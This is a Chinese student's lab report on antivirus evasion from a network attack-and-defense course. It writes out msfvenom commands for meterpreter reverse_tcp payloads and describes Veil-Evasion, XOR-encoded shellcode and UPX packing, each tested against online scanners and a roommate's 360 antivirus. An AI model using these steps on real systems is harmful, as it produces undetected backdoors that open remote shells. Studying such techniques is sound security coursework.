2017-2018-2 20155231《网络对抗技术》实验三:免杀原理与实践

2017-2018-2 20155231《网络对抗技术》实验3:免杀原理与实践

实验内容

正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧

使用msf编码器生成jar包
  • 使用指令msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.174.130 lport=5231 x> 5231_backjar.jar 生成jar文件
  • 上传检测http://www.virscan.org/

直接gg

veil-evasion
  • 输入指令veil进入veil界面 ,输入use evasionlist payloads进入模板界面。(不知道为啥,随便选择一个运行有错,只有选择5才能运行)复制模板,use 模板运行
  • 依然用set LHOST 192.168.174.130,set LPORT 5231设置
  • generate运行
  • 找到生成的文件,上传检测

这居然成了!

然而并没有,上传错了文件,exe文件没有通过检测,并且直接被管家杀了

自己利用shellcode编程
  • 使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.35.132 LPORT=443 -f c生成buf[];

  • 利用buf[]生成c语言文件

  • 生成exe文件并且回连

  • (生成的exe文件没有被查杀,还以为成了,但再次打开时遭到了查杀。。。。。)

  • 上传检测

失败

通过组合应用各种技术实现恶意代码免杀

利用shellcode编程更改
  • 这里异或了31

  • (没有被查杀)

  • 进行回连

  • 上传检测

失败+1

加壳
  • upx #需要加壳的文件名 -o #加壳后的文件名

  • 将之前的shellcode生成的exe文件进行加壳。

  • 回连

(神奇?!编译时不会被查杀,手动查杀也没被查杀,再次打开时依然被查杀了)

-上传检测

失败再+1

加壳之前veil的exe文件,检测,恩,加壳还是有用的,数量减少

用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

  • 将更改加壳后的shellcode编程文件在室友电脑上运行

  • 室友的杀毒软件为360

  • 未被查杀,回连

基础问题回答

  1. 杀软是如何检测出恶意代码的?
  • 通过对比病毒库,检测恶意代码的特征;
  • 或者对比和正常代码的区别
  • 或者监测文件行为
  1. 免杀是做什么?
  • 免杀就是让安插的后门不被AV软件发现
  1. 免杀的基本方法有哪些?
  • 改变特征码,如shellcode编程
  • 改变行为,利用回连或者隧道灯技术

实践总结与体会

  • 虽然大部分被认定为病毒,很伤心,只有veil生成的rc文件通过了检测,只有更改的shellcode编程文件没有被管家检测出来
  • 不过,运用综合技术生成的最终版文件在同学的电脑上也躲过了360的检查,实现了免杀,还可以
  • 由于和室友电脑相互ping不通,没有实现回连,没有实现最终的攻击室友电脑的操作…………hhh

离实战还缺些什么技术或步骤?

  • 和同学几乎一样的操作,但结果经常不同,对于不同的杀毒软件也有不同的结果。手动的很多方法都没通过,反而veil直接给予的模板通过了检测
posted @ 2018-04-11 08:53  名字最难取  阅读(84)  评论(0编辑  收藏  举报